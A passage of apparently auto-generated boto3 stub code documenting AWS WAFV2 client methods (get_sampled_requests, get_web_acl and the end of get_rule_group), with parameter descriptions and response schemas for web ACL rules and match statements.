You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --
The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
Action (dict) --
The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.
This is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .
You must specify either this Action setting or the rule OverrideAction setting, but not both:
If the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.
If the rule statement references a rule group, use the override action setting and not this action setting.
Block (dict) --
Instructs AWS WAF to block the web request.
Allow (dict) --
Instructs AWS WAF to allow the web request.
Count (dict) --
Instructs AWS WAF to count the web request and allow it.
OverrideAction (dict) --
The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --
Override the rule action setting to count.
None (dict) --
Don\'t override the rule action setting.
VisibilityConfig (dict) --
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
VisibilityConfig (dict) --
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'RuleGroup': {
'Name': 'string',
'Id': 'string',
'Capacity': 123,
'ARN': 'string',
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
'LockToken': 'string'
}
:returns:
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
"""
pass
def get_sampled_requests(WebAclArn=None, RuleMetricName=None, Scope=None, TimeWindow=None, MaxItems=None):
"""
Gets detailed information about a specified number of requests--a sample--that AWS WAF randomly selects from among the first 5,000 requests that your AWS resource received during a time range that you choose. You can specify a sample size of up to 500 requests, and you can specify any time range in the previous three hours.
See also: AWS API Documentation
Exceptions
:example: response = client.get_sampled_requests(
WebAclArn='string',
RuleMetricName='string',
Scope='CLOUDFRONT'|'REGIONAL',
TimeWindow={
'StartTime': datetime(2015, 1, 1),
'EndTime': datetime(2015, 1, 1)
},
MaxItems=123
)
:type WebAclArn: string
:param WebAclArn: [REQUIRED]\nThe Amazon resource name (ARN) of the WebACL for which you want a sample of requests.\n
:type RuleMetricName: string
:param RuleMetricName: [REQUIRED]\nThe metric name assigned to the Rule or RuleGroup for which you want a sample of requests.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type TimeWindow: dict
:param TimeWindow: [REQUIRED]\nThe start date and time and the end date and time of the range for which you want GetSampledRequests to return a sample of requests. Specify the date and time in the following format: '2016-09-27T14:50Z' . You can specify any time range in the previous three hours.\n\nStartTime (datetime) -- [REQUIRED]The beginning of the time range from which you want GetSampledRequests to return a sample of the requests that your AWS resource received. Specify the date and time in the following format: '2016-09-27T14:50Z' . You can specify any time range in the previous three hours.\n\nEndTime (datetime) -- [REQUIRED]The end of the time range from which you want GetSampledRequests to return a sample of the requests that your AWS resource received. Specify the date and time in the following format: '2016-09-27T14:50Z' . You can specify any time range in the previous three hours.\n\n\n
:type MaxItems: integer
:param MaxItems: [REQUIRED]\nThe number of requests that you want AWS WAF to return from among the first 5,000 requests that your AWS resource received during the time range. If your resource received fewer requests than the value of MaxItems , GetSampledRequests returns information about all of them.\n
:rtype: dict
ReturnsResponse Syntax
{
'SampledRequests': [
{
'Request': {
'ClientIP': 'string',
'Country': 'string',
'URI': 'string',
'Method': 'string',
'HTTPVersion': 'string',
'Headers': [
{
'Name': 'string',
'Value': 'string'
},
]
},
'Weight': 123,
'Timestamp': datetime(2015, 1, 1),
'Action': 'string',
'RuleNameWithinRuleGroup': 'string'
},
],
'PopulationSize': 123,
'TimeWindow': {
'StartTime': datetime(2015, 1, 1),
'EndTime': datetime(2015, 1, 1)
}
}
Response Structure
(dict) --
SampledRequests (list) --
A complex type that contains detailed information about each of the requests in the sample.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Represents a single sampled web request. The response from GetSampledRequests includes a SampledHTTPRequests complex type that appears as SampledRequests in the response syntax. SampledHTTPRequests contains an array of SampledHTTPRequest objects.
Request (dict) --
A complex type that contains detailed information about the request.
ClientIP (string) --
The IP address that the request originated from. If the web ACL is associated with a CloudFront distribution, this is the value of one of the following fields in CloudFront access logs:
c-ip , if the viewer did not use an HTTP proxy or a load balancer to send the request
x-forwarded-for , if the viewer did use an HTTP proxy or a load balancer to send the request
Country (string) --
The two-letter country code for the country that the request originated from. For a current list of country codes, see the Wikipedia entry ISO 3166-1 alpha-2 .
URI (string) --
The URI path of the request, which identifies the resource, for example, /images/daily-ad.jpg .
Method (string) --
The HTTP method specified in the sampled web request.
HTTPVersion (string) --
The HTTP version specified in the sampled web request, for example, HTTP/1.1 .
Headers (list) --
A complex type that contains the name and value for each header in the sampled web request.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Part of the response from GetSampledRequests . This is a complex type that appears as Headers in the response syntax. HTTPHeader contains the names and values of all of the headers that appear in one of the web requests.
Name (string) --
The name of the HTTP header.
Value (string) --
The value of the HTTP header.
Weight (integer) --
A value that indicates how one result in the response relates proportionally to other results in the response. For example, a result that has a weight of 2 represents roughly twice as many web requests as a result that has a weight of 1 .
Timestamp (datetime) --
The time at which AWS WAF received the request from your AWS resource, in Unix time format (in seconds).
Action (string) --
The action for the Rule that the request matched: ALLOW , BLOCK , or COUNT .
RuleNameWithinRuleGroup (string) --
The name of the Rule that the request matched. For managed rule groups, the format for this name is <vendor name>#<managed rule group name>#<rule name> . For your own rule groups, the format for this name is <rule group name>#<rule name> . If the rule is not in a rule group, the format is <rule name> .
PopulationSize (integer) --
The total number of requests from which GetSampledRequests got a sample of MaxItems requests. If PopulationSize is less than MaxItems , the sample includes every request that your AWS resource received during the specified time range.
TimeWindow (dict) --
Usually, TimeWindow is the time range that you specified in the GetSampledRequests request. However, if your AWS resource received more than 5,000 requests during the time range that you specified in the request, GetSampledRequests returns the time range for the first 5,000 requests.
StartTime (datetime) --
The beginning of the time range from which you want GetSampledRequests to return a sample of the requests that your AWS resource received. Specify the date and time in the following format: "2016-09-27T14:50Z" . You can specify any time range in the previous three hours.
EndTime (datetime) --
The end of the time range from which you want GetSampledRequests to return a sample of the requests that your AWS resource received. Specify the date and time in the following format: "2016-09-27T14:50Z" . You can specify any time range in the previous three hours.
Exceptions
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
:return: {
'SampledRequests': [
{
'Request': {
'ClientIP': 'string',
'Country': 'string',
'URI': 'string',
'Method': 'string',
'HTTPVersion': 'string',
'Headers': [
{
'Name': 'string',
'Value': 'string'
},
]
},
'Weight': 123,
'Timestamp': datetime(2015, 1, 1),
'Action': 'string',
'RuleNameWithinRuleGroup': 'string'
},
],
'PopulationSize': 123,
'TimeWindow': {
'StartTime': datetime(2015, 1, 1),
'EndTime': datetime(2015, 1, 1)
}
}
:returns:
c-ip , if the viewer did not use an HTTP proxy or a load balancer to send the request
x-forwarded-for , if the viewer did use an HTTP proxy or a load balancer to send the request
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def get_web_acl(Name=None, Scope=None, Id=None):
"""
Retrieves the specified WebACL .
See also: AWS API Documentation
Exceptions
:example: response = client.get_web_acl(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nThe unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'WebACL': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'DefaultAction': {
'Block': {},
'Allow': {}
},
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
'Capacity': 123,
'PreProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'PostProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'ManagedByFirewallManager': True|False
},
'LockToken': 'string'
}
Response Structure
(dict) --
WebACL (dict) --
The Web ACL specification. You can modify the settings in this Web ACL and use it to update this Web ACL or create a new one.
Name (string) --
The name of the Web ACL. You cannot change the name of a Web ACL after you create it.
Id (string) --
A unique identifier for the WebACL . This ID is returned in the responses to create and list commands. You use this ID to do things like get, update, and delete a WebACL .
ARN (string) --
The Amazon Resource Name (ARN) of the Web ACL that you want to associate with the resource.
DefaultAction (dict) --
The action to perform if none of the Rules contained in the WebACL match.
Block (dict) --
Specifies that AWS WAF should block requests by default.
Allow (dict) --
Specifies that AWS WAF should allow requests by default.
Description (string) --
A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
Rules (list) --
The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
Name (string) --
The name of the rule. You can\'t change the name of a Rule after you create it.
Priority (integer) --
If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.
Statement (dict) --
The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .
ByteMatchStatement (dict) --
A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.
SearchString (bytes) --
A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.
Valid values depend on the component that you specify for inspection in FieldToMatch :
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
If SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.
If you\'re using the AWS WAF API
Specify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.
For example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .
If you\'re using the AWS CLI or one of the AWS SDKs
The value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
